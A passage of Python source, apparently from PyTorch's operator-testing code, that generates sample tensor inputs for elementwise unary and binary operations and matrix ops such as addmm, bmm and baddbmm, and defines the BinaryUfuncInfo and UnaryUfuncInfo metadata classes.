): shapes = ( ((1,), ()), ((2,), ()), ((1,), (2,)), ((2, 1), (2,)), ((1, 2), (2,)), ((3, 2), (2,)), ((1, 3, 2), (2,)), ((1, 3, 2), (3, 2)), ((3, 1, 2), (3, 2)), ((2, 3, 2), ()), ((3, 1, 2), (1, 3, 2)), ) make_arg = partial( make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero ) for shape, noncontiguous in product(shapes, [True, False]): shape_lhs, shape_rhs = shape lhs = make_arg( shape_lhs, noncontiguous=noncontiguous, **op.lhs_make_tensor_kwargs ) rhs = make_arg( shape_rhs, noncontiguous=noncontiguous, **op.rhs_make_tensor_kwargs ) yield SampleInput(lhs, args=(rhs,), broadcasts_input=True) # Returns a generator of pairs of contiguous tensors and scalars def generate_elementwise_binary_with_scalar_samples( op, *, device, dtype, requires_grad=False ): make_arg = partial( make_tensor, device=device, dtype=dtype, requires_grad=requires_grad ) shapes = ((), (3,), (5, 3), (0, 1, 3), (1, 5)) if op.supports_rhs_python_scalar: for shape in shapes: lhs = make_arg(shape, **op.lhs_make_tensor_kwargs) rhs = make_arg(shape, **op.rhs_make_tensor_kwargs) lhs_scalar = make_arg((), **op.lhs_make_tensor_kwargs).item() rhs_scalar = make_arg((), **op.rhs_make_tensor_kwargs).item() yield SampleInput(lhs, args=(rhs_scalar,)) # Extends with scalar lhs if op.supports_one_python_scalar: yield SampleInput(lhs_scalar, args=(rhs,)) if op.supports_two_python_scalars: lhs_scalar = make_arg((), **op.lhs_make_tensor_kwargs).item() rhs_scalar = make_arg((), **op.rhs_make_tensor_kwargs).item() yield SampleInput(lhs_scalar, args=(rhs_scalar,)) # Returns a generator of pairs of contiguous tensors and 0d tensos and scalars and type promotion def generate_elementwise_binary_with_scalar_and_type_promotion_samples( op, *, device, dtype, requires_grad=False ): # add these samples only for logical and comparison ops, arithmetic ops are not happy about extremal scalars if op.name in ('eq', 'ne', 'gt', 'ge', 'lt', 'le', 'logical_and', 'logical_or', 'logical_xor'): make_arg = partial( make_tensor, device=device, dtype=dtype, requires_grad=requires_grad ) shape = (23,) # this shape is big enough to trigger vectorization, and has non-vectorized tail values = (float('nan'), float('inf'), -float('inf')) scalar_tensors = tuple(torch.tensor(val) for val in values) if op.supports_rhs_python_scalar: lhs = make_arg(shape, **op.lhs_make_tensor_kwargs) rhs = make_arg(shape, **op.rhs_make_tensor_kwargs) for scalar in values + scalar_tensors: yield SampleInput(lhs, args=(scalar,)) # Extends with scalar lhs if op.supports_one_python_scalar: yield SampleInput(scalar, args=(rhs,)) # Returns a generator of pairs of noncontiguous tensors def generate_elementwise_binary_noncontiguous_tensors( op, *, device, dtype, requires_grad=False, exclude_zero=False ): make_arg = partial( make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero ) # Generic noncontiguity lhs = make_arg((1026,), noncontiguous=True, **op.lhs_make_tensor_kwargs) rhs = make_arg((1026,), noncontiguous=True, **op.rhs_make_tensor_kwargs) yield SampleInput(lhs.clone(), args=(rhs.clone(),)) yield SampleInput(lhs.contiguous(), args=(rhs,)) # Transposed lhs = make_arg((789, 357), **op.lhs_make_tensor_kwargs) rhs = make_arg((789, 357), **op.rhs_make_tensor_kwargs) yield SampleInput(lhs.T, args=(rhs.T,)) # More noncontiguity shapes = ((5, 7), (1024,)) for shape in shapes: lhs = make_arg(shape, **op.lhs_make_tensor_kwargs) rhs = make_arg(shape, **op.rhs_make_tensor_kwargs) lhs_non_contig = torch.empty(shape + (2,), device=device, dtype=dtype)[..., 0] lhs_non_contig.copy_(lhs) rhs_non_contig = torch.empty(shape + (2,), device=device, dtype=dtype)[..., 0] rhs_non_contig.copy_(rhs) yield SampleInput(lhs_non_contig.clone(), args=(rhs_non_contig.clone(),)) yield SampleInput(lhs_non_contig.contiguous(), args=(rhs_non_contig,)) # Noncontiguous indices shape = (2, 2, 1, 2) lhs = make_arg(shape, **op.lhs_make_tensor_kwargs) rhs = make_arg(shape, **op.rhs_make_tensor_kwargs) lhs_non_contig = lhs[:, 1, ...] rhs_non_contig = rhs[:, 1, ...] yield SampleInput(lhs_non_contig.clone(), args=(rhs_non_contig.clone(),)) yield SampleInput(lhs_non_contig.contiguous(), args=(rhs_non_contig,)) # Expanded tensors shapes = ((1, 3), (1, 7), (5, 7)) for shape in shapes: lhs = make_arg(shape, **op.lhs_make_tensor_kwargs) rhs = make_arg(shape, **op.rhs_make_tensor_kwargs) lhs_non_contig = lhs.expand(3, -1, -1) rhs_non_contig = rhs.expand(3, -1, -1) yield SampleInput(lhs_non_contig, args=(rhs_non_contig,)) # Sample inputs for elementwise binary operators, like add def sample_inputs_elementwise_binary(op, device, dtype, requires_grad, **kwargs): if hasattr(op, "rhs_make_tensor_kwargs"): exclude_zero = op.rhs_make_tensor_kwargs.get("exclude_zero", False) make_arg = partial( make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero ) shapes = ( ((), ()), ((S,), ()), ((S, 1), (S,)), ((M, S), ()), ((S, M, S), (M, S)), ((S, M, S), (S, M, S)), ((M, 1, S), (M, S)), ((M, 1, S), (1, M, S)), ((0, 1, 3), (0, 10, 3)), ) sample_kwargs = kwargs.get("sample_kwargs", {}) for shape_lhs, shape_rhs in shapes: lhs = make_arg(shape_lhs, **op.lhs_make_tensor_kwargs) rhs = make_arg(shape_rhs, **op.rhs_make_tensor_kwargs) broadcasts_input = shape_lhs != torch.broadcast_shapes(shape_lhs, shape_rhs) yield SampleInput( lhs, args=(rhs,), kwargs=sample_kwargs, broadcasts_input=broadcasts_input ) def sample_inputs_jiterator(op, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) shapes = ( ((), ()), ((S,), ()), ((S, 1), (S,)), ((M, S), ()), ((S, M, S), (M, S)), ((S, M, S), (S, M, S)), ((M, 1, S), (M, S)), ((M, 1, S), (1, M, S)), ((0, 1, 3), (0, 10, 3)) ) num_inputs = kwargs.get('num_inputs') sample_kwargs = kwargs.get('sample_kwargs', {}) for shape_lhs, shape_rhs in shapes: lhs = make_arg(shape_lhs) args = [] for i in range(num_inputs - 1): args.append(make_arg(shape_rhs)) broadcasts_input = (shape_lhs != torch.broadcast_shapes(shape_lhs, shape_rhs)) yield SampleInput(lhs, args=tuple(args), kwargs=sample_kwargs, broadcasts_input=broadcasts_input) def sample_inputs_broadcast_shapes(op, device, dtype, requires_grad, **kwargs): shapes = ( ((), ()), ((S,), ()), ((S, 1), (S,)), ((S, 1), S), ((M, S), ()), ((S, M, S), (M, S)), ((S, M, S), (S, M, S)), ((M, 1, S), (M, S)), ((M, 1, S), (1, M, S)), ((0, 1, 3), (0, 10, 3)) ) for shape in shapes: inp, *arg0 = shape yield SampleInput(inp, args=arg0) # The base reference input generation for elementwise binary operations def _reference_inputs_elementwise_binary(op, device, dtype, requires_grad, exclude_zero, **kwargs): yield from op.sample_inputs_func(op, device, dtype, requires_grad, **kwargs) yield from generate_elementwise_binary_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero ) if dtype is not torch.bool: yield from generate_elementwise_binary_small_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad ) if dtype not in (torch.bool, torch.uint8, torch.int8): yield from generate_elementwise_binary_large_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad ) # TODO: FIXME: RuntimeError: "index_select" not implemented for 'ComplexHalf' if dtype not in (torch.chalf,): yield from generate_elementwise_binary_broadcasting_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero ) yield from generate_elementwise_binary_with_scalar_samples( op, device=device, dtype=dtype, requires_grad=requires_grad ) yield from generate_elementwise_binary_with_scalar_and_type_promotion_samples( op, device=device, dtype=dtype, requires_grad=requires_grad ) if dtype.is_floating_point or dtype.is_complex: yield from generate_elementwise_binary_extremal_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad ) # Note that these references inputs use scalars for the SampleInput.input value, # and many tests require SampleInput.input be a tensor or a list of tensors def reference_inputs_elementwise_binary(op, device, dtype, requires_grad, **kwargs): if hasattr(op, "rhs_make_tensor_kwargs"): exclude_zero = op.rhs_make_tensor_kwargs.get("exclude_zero", False) gen = partial( _reference_inputs_elementwise_binary, op, device, dtype, requires_grad, exclude_zero, **kwargs ) # yields "normal" samples yield from gen() # TODO: RuntimeError: "index_select" not implemented for 'ComplexHalf' if dtype is torch.chalf: return # yields noncontiguous samples for sample in gen(): yield sample.noncontiguous() yield from generate_elementwise_binary_noncontiguous_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero ) yield from generate_elementwise_binary_arbitrarily_strided_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero ) # A functional that extends an elementwise binary operator's bespoke error inputs # with generic error inputs for the class of elementwise binary operations def make_error_inputs_elementwise_binary(error_inputs_func): def error_inputs_func_wrapper(op, device, **kwargs): if error_inputs_func is not None: yield from error_inputs_func(op, device, **kwargs) if not op.supports_rhs_python_scalar: si = SampleInput(torch.tensor((1, 2, 3), device=device), args=(2,)) yield ErrorInput(si, error_type=Exception, error_regex="") if not op.supports_one_python_scalar: si = SampleInput(2, args=(torch.tensor((1, 2, 3), device=device),)) yield ErrorInput(si, error_type=Exception, error_regex="") if ( not kwargs.get("skip_two_python_scalars", False) and not op.supports_two_python_scalars ): si = SampleInput(2, args=(3,)) yield ErrorInput(si, error_type=Exception, error_regex="") return error_inputs_func_wrapper # Metadata class for binary "universal functions (ufuncs)" that accept two # tensor and have common properties class BinaryUfuncInfo(OpInfo): """Operator information for 'universal binary functions (binary ufuncs).' These are functions of two tensors with common properties like: - they are elementwise functions - the output shape is determined by the input shape - they typically have method and inplace variants - they typically support the out kwarg - they typically have NumPy or SciPy references See NumPy's universal function documentation (https://numpy.org/doc/stable/reference/ufuncs.html) for more details about the concept of ufuncs. """ def __init__( self, name, *, sample_inputs_func=sample_inputs_elementwise_binary, reference_inputs_func=reference_inputs_elementwise_binary, error_inputs_func=None, lhs_make_tensor_kwargs=None, rhs_make_tensor_kwargs=None, promotes_int_to_float=False, # Set to true if the op promotes integer inputs to float always_returns_bool=False, # Set to true if the op always returns bool tensors supports_rhs_python_scalar=True, # Whether the operator allows Tensor x scalar inputs supports_one_python_scalar=False, # Whether the operator allows scalar x tensor and tensor x scalar inputs supports_two_python_scalars=False, # Whether the operator allows scalar x scalar inputs **kwargs, ): self._original_binary_ufunc_args = locals().copy() # Elementwise binary operations perform the equivalent of test_numpy_refs # in test_binary_ufuncs, but with additional test granularity. So the # generic test_ops.py test is skipped because it's redundant. common_skips = ( DecorateInfo( unittest.skip("Skipping redundant test."), "TestCommon", "test_numpy_refs", ), ) kwargs["skips"] = kwargs.get("skips", tuple()) + common_skips super(BinaryUfuncInfo, self).__init__( name, sample_inputs_func=sample_inputs_func, reference_inputs_func=reference_inputs_func, error_inputs_func=make_error_inputs_elementwise_binary(error_inputs_func), **kwargs, ) # [lr]hs_make_tensor_kwargs are part of the OpInfo to be able to dynamically generate valid samples later on. if lhs_make_tensor_kwargs is None: lhs_make_tensor_kwargs = {} self.lhs_make_tensor_kwargs = lhs_make_tensor_kwargs if rhs_make_tensor_kwargs is None: rhs_make_tensor_kwargs = {} self.rhs_make_tensor_kwargs = rhs_make_tensor_kwargs self.promotes_int_to_float = promotes_int_to_float self.always_returns_bool = always_returns_bool self.supports_rhs_python_scalar = supports_rhs_python_scalar self.supports_one_python_scalar = supports_one_python_scalar self.supports_two_python_scalars = supports_two_python_scalars if self.supports_two_python_scalars: self.supports_one_python_scalar = True if self.supports_one_python_scalar: assert ( supports_rhs_python_scalar ), "Can't support lhs and rhs Python scalars but not rhs scalars!" # The following functions and classes are for testing elementwise unary operators. def sample_inputs_elementwise_unary( op_info, device, dtype, requires_grad, op_kwargs=None, **kwargs ): if not op_kwargs: op_kwargs = {} low, high = op_info.domain low = low if low is None else low + op_info._domain_eps high = high if high is None else high - op_info._domain_eps if op_info.supports_sparse_csr: # Tensors with dim=2 for sparse CSR testing yield SampleInput( make_tensor( (L, L), device=device, dtype=dtype, low=low, high=high, requires_grad=requires_grad, ), kwargs=op_kwargs, ) else: # Creates a 1D, empty, and scalar tensor for shape in ((L,), (1, 0, 3), ()): yield SampleInput( make_tensor( shape, device=device, dtype=dtype, low=low, high=high, requires_grad=requires_grad, ), kwargs=op_kwargs, ) # Replace values satisfying condition with a safe value. This is used to block # out values the could cause singularity like tan(pi/2) def _replace_values_in_tensor(tensor, condition, safe_value): mask = condition(tensor) tensor.masked_fill_(mask, safe_value) # Helper to create a unary elementwise tensor with valid inputs def _make_unary_elementwise_tensor(shape, *, op, dtype, **kwargs): low, high = op.domain low = low if low is None else low + op._domain_eps high = high if high is None else high - op._domain_eps a = make_tensor(shape, low=low, high=high, dtype=dtype, **kwargs) if op.reference_numerics_filter is not None and dtype is not torch.bool: condition, safe_value = op.reference_numerics_filter _replace_values_in_tensor(a, condition, safe_value) return a # Restricts the values in the tensor to the domain of the # given elementwise unary operator def _filter_unary_elementwise_tensor(a, *, op): # short-circuits for boolean tensors if a.dtype is torch.bool: return a low, high = op.domain low = low if low is None else low + op._domain_eps high = high if high is None else high - op._domain_eps if a.dtype is torch.uint8 and low is not None: low = max(low, 0) if not a.dtype.is_floating_point and not a.dtype.is_complex: low = math.ceil(low) if low is not None else None high = math.floor(high) if high is not None else None if op.reference_numerics_filter is not None: condition, safe_value = op.reference_numerics_filter _replace_values_in_tensor(a, condition, safe_value) if low is not None or high is not None: if a.dtype.is_complex: a.real.clamp_(low, high) a.imag.clamp_(low, high) else: a.clamp_(min=low, max=high) return a def generate_elementwise_unary_tensors(op, *, device, dtype, requires_grad, **kwargs): # Special-cases bool if dtype is torch.bool: tensors = ( torch.empty(0, device=device, dtype=torch.bool), torch.tensor(True, device=device), torch.tensor(False, device=device), torch.tensor((True, False), device=device), make_tensor((812,), device=device, dtype=dtype), make_tensor((1029, 917), device=device, dtype=dtype), ) for a in tensors: yield SampleInput(a, kwargs=op.sample_kwargs(device, dtype, a)[0]) shapes = ( (1029, 917), (812,), # Empty sizes (0,), (0, 3, 3), (1, 0, 5), (6, 0, 0, 0), (3, 0, 1, 0), ) make_arg = partial( _make_unary_elementwise_tensor, op=op, device=device, dtype=dtype, requires_grad=requires_grad, ) for shape in shapes: a = make_arg(shape) yield SampleInput(a, kwargs=op.sample_kwargs(device, dtype, a)[0]) def generate_elementwise_unary_small_value_tensors( op, *, device, dtype, requires_grad=False ): for sample in generate_elementwise_binary_small_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad ): a = _filter_unary_elementwise_tensor(sample.input, op=op) yield SampleInput(a, kwargs=op.sample_kwargs(device, dtype, a)[0]) def generate_elementwise_unary_large_value_tensors( op, *, device, dtype, requires_grad=False ): for sample in generate_elementwise_binary_large_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad ): a = _filter_unary_elementwise_tensor(sample.input, op=op) yield SampleInput(sample.input, kwargs=op.sample_kwargs(device, dtype, a)[0]) def generate_elementwise_unary_extremal_value_tensors( op, *, device, dtype, requires_grad=False ): for sample in generate_elementwise_binary_extremal_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad ): yield SampleInput( sample.input, kwargs=op.sample_kwargs(device, dtype, sample.input)[0] ) def generate_elementwise_unary_noncontiguous_tensors( op, *, device, dtype, requires_grad=False ): low, high = op.domain low = low if low is None else low + op._domain_eps high = high if high is None else high - op._domain_eps make_arg = partial( _make_unary_elementwise_tensor, op=op, device=device, dtype=dtype, requires_grad=requires_grad, ) # Generic noncontiguity t = make_arg((1026,), noncontiguous=True) yield SampleInput(t, kwargs=op.sample_kwargs(device, dtype, t)[0]) # Transposed t = make_arg((1024, 1024)).T yield SampleInput(t, kwargs=op.sample_kwargs(device, dtype, t)[0]) # Expanded tensors shapes = ((1, 3), (1, 7), (5, 7)) for shape in shapes: t = make_arg(shape) t_non_contig = t.expand(3, -1, -1) yield SampleInput( t_non_contig, kwargs=op.sample_kwargs(device, dtype, t_non_contig)[0] ) def generate_elementwise_unary_arbitrarily_strided_tensors(op, *, device, dtype, requires_grad=False): # shape, strides, offset strided_cases = ( ((5, 6, 2), (1, 1, 7), 2), ((5, 5, 4), (1, 1, 7), 2), ((5, 5, 2), (4, 5, 7), 3), ((5, 5, 2), (5, 5, 7), 3), ((5, 5, 2), (5, 5, 5), 3), ((9, 5, 2), (0, 1, 7), 3), ) make_arg = partial( make_tensor, device=device, dtype=dtype, requires_grad=requires_grad ) for shape, strides, offset in strided_cases: a = make_arg(500,).as_strided(shape, strides, offset) yield SampleInput(a, kwargs=op.sample_kwargs(device, dtype, a)[0]) # Reuses the elementwise binary generators for consistency # TODO: in the future generalize the reference generators to handle n-ary elementwise operations def _reference_inputs_elementwise_unary(op, device, dtype, requires_grad, **kwargs): yield from op.sample_inputs_func(op, device, dtype, requires_grad, **kwargs) yield from generate_elementwise_unary_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs ) if dtype is not torch.bool: yield from generate_elementwise_unary_small_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs ) if dtype not in (torch.bool, torch.uint8, torch.int8) and ( op.handles_large_floats or (not dtype.is_floating_point and not dtype.is_complex) ): yield from generate_elementwise_unary_large_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs ) if dtype.is_floating_point or (op.handles_complex_extremal_values and dtype.is_complex): yield from generate_elementwise_unary_extremal_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs ) def reference_inputs_elementwise_unary(op, device, dtype, requires_grad, **kwargs): gen = partial( _reference_inputs_elementwise_unary, op, device, dtype, requires_grad, **kwargs ) # yields "normal" samples yield from gen() # yields noncontiguous samples for sample in gen(): yield sample.noncontiguous() yield from generate_elementwise_unary_noncontiguous_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs ) yield from generate_elementwise_unary_arbitrarily_strided_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs ) # Metadata class for unary "universal functions (ufuncs)" that accept a single # tensor and have common properties like: class UnaryUfuncInfo(OpInfo): """Operator information for 'universal unary functions (unary ufuncs).' These are functions of a single tensor with common properties like: - they are elementwise functions - the input shape is the output shape - they typically have method and inplace variants - they typically support the out kwarg - they typically have NumPy or SciPy references See NumPy's universal function documentation (https://numpy.org/doc/1.18/reference/ufuncs.html) for more details about the concept of ufuncs. """ def __init__( self, name, # the string name of the function *, ref, # a reference function dtypes=floating_types(), dtypesIfCUDA=None, dtypesIfROCM=None, domain=(None, None), # the [low, high) domain of the function handles_complex_extremal_values=True, # whether the op correctly handles extremal values (like nan/inf) handles_large_floats=True, # whether the op correctly handles large float values (like 1e20) supports_complex_to_float=False, # op supports casting from complex input to real output safely eg. angle sample_inputs_func=sample_inputs_elementwise_unary, reference_inputs_func=reference_inputs_elementwise_unary, sample_kwargs=lambda device, dtype, input: ({}, {}), supports_sparse=False, reference_numerics_filter=None, # Filters values in the range of the domain specified above but that should not be tested **kwargs, ): self._original_unary_ufunc_args = locals().copy() super(UnaryUfuncInfo, self).__init__( name, dtypes=dtypes, dtypesIfCUDA=dtypesIfCUDA, dtypesIfROCM=dtypesIfROCM, sample_inputs_func=sample_inputs_func, reference_inputs_func=reference_inputs_func, supports_sparse=supports_sparse, **kwargs, ) self.ref = ref self.domain = domain self.handles_complex_extremal_values = handles_complex_extremal_values self.handles_large_floats = handles_large_floats self.supports_complex_to_float = supports_complex_to_float self.reference_numerics_filter = reference_numerics_filter # test_unary_ufuncs.py generates its own inputs to test the consistency # of the operator on sliced tensors, non-contig tensors, etc. # `sample_kwargs` is a utility function to provide kwargs # along with those inputs if required (eg. clamp). # It should return two dictionaries, first holding kwarg for # torch operator and second one for reference NumPy operator. self.sample_kwargs = sample_kwargs # Epsilon to ensure grad and gradgrad checks don't test values # outside a function's domain. self._domain_eps = 1e-5 def sample_inputs_add_sub(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_elementwise_binary(op, device, dtype, requires_grad, **kwargs) # Adds alpha kwarg cases make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) lhs = make_arg((S, S), **op.lhs_make_tensor_kwargs) rhs = make_arg((S, S), **op.rhs_make_tensor_kwargs) if dtype is not torch.bool: yield SampleInput(lhs, args=(rhs,), kwargs={'alpha': 2}) else: yield SampleInput(lhs, args=(rhs,), kwargs={'alpha': True}) neg_alpha = -3.14 if (dtype.is_floating_point or dtype.is_complex) else -3 lhs = make_arg((S, S), **op.lhs_make_tensor_kwargs) rhs = make_arg((S, S), **op.rhs_make_tensor_kwargs) if dtype is not torch.bool: yield SampleInput(lhs, args=(rhs,), kwargs={'alpha': neg_alpha}) else: yield SampleInput(lhs, args=(rhs,), kwargs={'alpha': False}) def sample_inputs_isclose(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_elementwise_binary(op, device, dtype, requires_grad, **kwargs) # Creates additional inputs to test the rtol, atol, and equal_nan params rtols = [0., 1e-7] atols = [0., 1e-7] equal_nans = [False, True] products = product(rtols, atols, equal_nans) make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) for rtol, atol, equal_nan in products: lhs = make_arg((S, S), **op.lhs_make_tensor_kwargs) rhs = make_arg((S, S), **op.rhs_make_tensor_kwargs) yield SampleInput(lhs, args=(rhs,), kwargs=dict(rtol=rtol, atol=atol, equal_nan=equal_nan)) def sample_inputs_t(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) return (SampleInput(make_arg((1, 2))), SampleInput(make_arg((2,))), SampleInput(make_arg(()))) def sample_inputs_mm(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) def make_arg_conj(size): return make_arg(size).conj().requires_grad_(requires_grad) first_shape, second_shape = (S, M), (M, S) yield SampleInput(make_arg(first_shape), args=(make_arg(second_shape),)) if dtype.is_complex: yield SampleInput(make_arg(first_shape), args=(make_arg_conj(second_shape),)) def sample_inputs_addmm(op_info, device, dtype, requires_grad, **kwargs): alpha_val = kwargs.get('alpha', 2 + 3j if dtype.is_complex else 0.6) beta_val = kwargs.get('beta', 1 + 2j if dtype.is_complex else 0.2) tests_list = [ ((2, 3), (2, 2), (2, 3), False) ] tests_with_lhs_broadcasting = [ ((1,), (2, 2), (2, 3), True), ((), (2, 2), (2, 3), True) ] test_cases = tests_list + tests_with_lhs_broadcasting # type: ignore[operator] sample_inputs = [] for shape_a, shape_b, shape_c, broadcasts_input in test_cases: sample_inputs.append( SampleInput( make_tensor(shape_a, dtype=dtype, device=device, requires_grad=requires_grad), args=( make_tensor(shape_b, dtype=dtype, device=device, requires_grad=requires_grad), make_tensor(shape_c, dtype=dtype, device=device, requires_grad=requires_grad)), kwargs={'alpha': alpha_val, 'beta': beta_val}, broadcasts_input=broadcasts_input)) if dtype.is_complex: shape = (3, 3) sample_inputs.append( SampleInput(make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad), args=( make_tensor(shape, dtype=dtype, device=device).mH.requires_grad_(requires_grad), make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad)), kwargs={'alpha': alpha_val, 'beta': beta_val},)) sample_inputs.append( SampleInput(make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad), args=( make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad), make_tensor(shape, dtype=dtype, device=device).mH.requires_grad_(requires_grad)), kwargs={'alpha': alpha_val, 'beta': beta_val},)) return sample_inputs def sample_inputs_sparse_sampled_addmm(op_info, device, dtype, requires_grad, **kwargs): alpha = 2 + 3j if dtype.is_complex else 0.6 beta = 1 + 2j if dtype.is_complex else 0.2 def generator(): # sparse.sampled_addmm performs: alpha * (A @ B) * sparse_ones_like(C) + beta * C for m, n, k in itertools.product([0, 5], repeat=3): yield SampleInput( torch.eye(m, n, device=device, dtype=dtype) .to_sparse_csr() .requires_grad_(requires_grad), args=( make_tensor( (m, k), device=device, dtype=dtype, requires_grad=requires_grad, ), make_tensor( (k, n), device=device, dtype=dtype, requires_grad=requires_grad, ), ), kwargs={"alpha": alpha, "beta": beta}, ) return list(generator()) def sample_inputs_mv(self, device, dtype, requires_grad, **kwargs): return ( SampleInput( make_tensor((S, M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=( make_tensor((M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), ) ), ) def sample_inputs_bmm(self, device, dtype, requires_grad, **kwargs): return ( SampleInput( make_tensor((M, S, M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=( make_tensor((M, M, S, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), ) ), ) def sample_inputs_dot_vdot(self, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) def make_arg_conj(size): return make_arg(size).conj().requires_grad_(requires_grad) sample_inputs = [] sample_inputs.append(SampleInput(make_arg((S, )), args=(make_arg((S, )),))) if dtype.is_complex: # dot/vdot for (conj(input), conj(arg_tensor)) and (conj(input), arg_tensor) # is tested in test_conj_view (which tests operations with only conjugated input tensor # -- not conjugated arg tensors) sample_inputs.append(SampleInput(make_arg((S, )), args=(make_arg_conj((S, )),))) return sample_inputs def sample_inputs_addmv(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) test_cases = (((S,), (S, M), (M,), 1, 1, False), ((S,), (S, M), (M,), 0.2, 0.6, False), ) test_cases_with_broadcast = (((1,), (S, M), (M,), 1, 1, True), ((1,), (S, M), (M,), 0.2, 0.6, True), ((), (S, M), (M,), 1, 1, True), ((), (S, M), (M,), 0.2, 0.6, True), ) cases = test_cases + test_cases_with_broadcast # addmv performs: beta * M + alpha * (mat @ vec) for size, mat, vec, beta, alpha, broadcasts_input in cases: yield SampleInput(make_arg(size), args=(make_arg(mat), make_arg(vec)), kwargs=dict(beta=beta, alpha=alpha), broadcasts_input=broadcasts_input) def sample_inputs_addbmm(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # input_shape, batch1_shape, batch2_shape, beta_val, alpha_val, is_broadcasting test_cases = [((S, M), (S, S, S), (S, S, M), 1, 1, False), ((1,), (S, S, S), (S, S, M), 1, 1, True), ((S, M), (S, S, S), (S, S, M), 0.6, 0.2, False), ((1,), (S, S, S), (S, S, M), 0.6, 0.2, True), ((), (S, S, S), (S, S, M), 1, 1, True), ((), (S, S, S), (S, S, M), 0.6, 0.2, True), ] for input_shape, batch1_shape, batch2_shape, beta, alpha, is_broadcasting in test_cases: if dtype.is_complex: beta_complex, alpha_complex = beta * (1 + 2j), alpha * (2 + 3j) yield SampleInput(make_arg(input_shape), args=(make_arg(batch1_shape), make_arg(batch2_shape)), kwargs=dict(beta=beta_complex, alpha=alpha_complex), broadcasts_input=is_broadcasting) yield SampleInput(make_arg(input_shape), args=(make_arg(batch1_shape), make_arg(batch2_shape)), kwargs=dict(beta=beta, alpha=alpha), broadcasts_input=is_broadcasting) def sample_inputs_addcmul_addcdiv(op_info, device, dtype, requires_grad, **kwargs): test_cases = [(((S, S), (S, S), (S, S)), False), (((S, S), (S, 1), (1, S)), False), (((1,), (S, S, 1), (1, S)), True), (((), (), ()), False), (((S, S), (), ()), True), (((), (S, S, 1), (1, S)), True) ] sample_inputs = [] for input_args, broadcasts_input in test_cases: # addcdiv should accept inputs with zero value # Currently, it throws ZeroDivisionError when the denominator is zero # TODO: exclude_zeros can be removed after https://github.com/pytorch/pytorch/issues/73638 is fixed args = tuple(make_tensor(arg, dtype=dtype, device=device, requires_grad=requires_grad, exclude_zero=True) if isinstance(arg, tuple) else arg for arg in input_args) sample_inputs.append(SampleInput( args[0], args=args[1:], broadcasts_input=broadcasts_input)) # addcdiv should accept inputs with zero value # Currently, it throws ZeroDivisionError when the denominator is zero # TODO: exclude_zeros can be removed after https://github.com/pytorch/pytorch/issues/73638 is fixed args = tuple(make_tensor(arg, dtype=dtype, device=device, requires_grad=requires_grad, exclude_zero=True) if isinstance(arg, tuple) else arg for arg in input_args) sample_inputs.append(SampleInput( args[0], args=args[1:], kwargs=dict(value=3.14), broadcasts_input=broadcasts_input)) return tuple(sample_inputs) def sample_inputs_baddbmm(op_info, device, dtype, requires_grad, **kwargs): test_cases = [((S, S, M), (S, S, S), (S, S, M), 1, 1, False), ((1,), (S, S, S), (S, S, M), 1, 1, True), ((S, S, M), (S, S, S), (S, S, M), 0.6, 0.2, False), ((1,), (S, S, S), (S, S, M), 0.6, 0.2, True), ((), (S, S, S), (S, S, M), 1, 1, True), ((), (S, S, S), (S, S, M), 0.6, 0.2, True), ] sample_inputs = [] for (input_shape, batch1_shape, batch2_shape, alpha, beta, broadcasts_input) in test_cases: args = (make_tensor(input_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor(batch1_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor(batch2_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)) sample_inputs.append(SampleInput(args[0], args=(args[1], args[2]), kwargs=dict(beta=beta, alpha=alpha), broadcasts_input=broadcasts_input)) if dtype.is_complex: sample_inputs.append(SampleInput( args[0].clone().requires_grad_(requires_grad), args=(args[1].clone().requires_grad_(requires_grad), args[2].clone().requires_grad_(requires_grad)), kwargs=dict(beta=beta * (1 + 2j), alpha=alpha * (2 + 3j)), 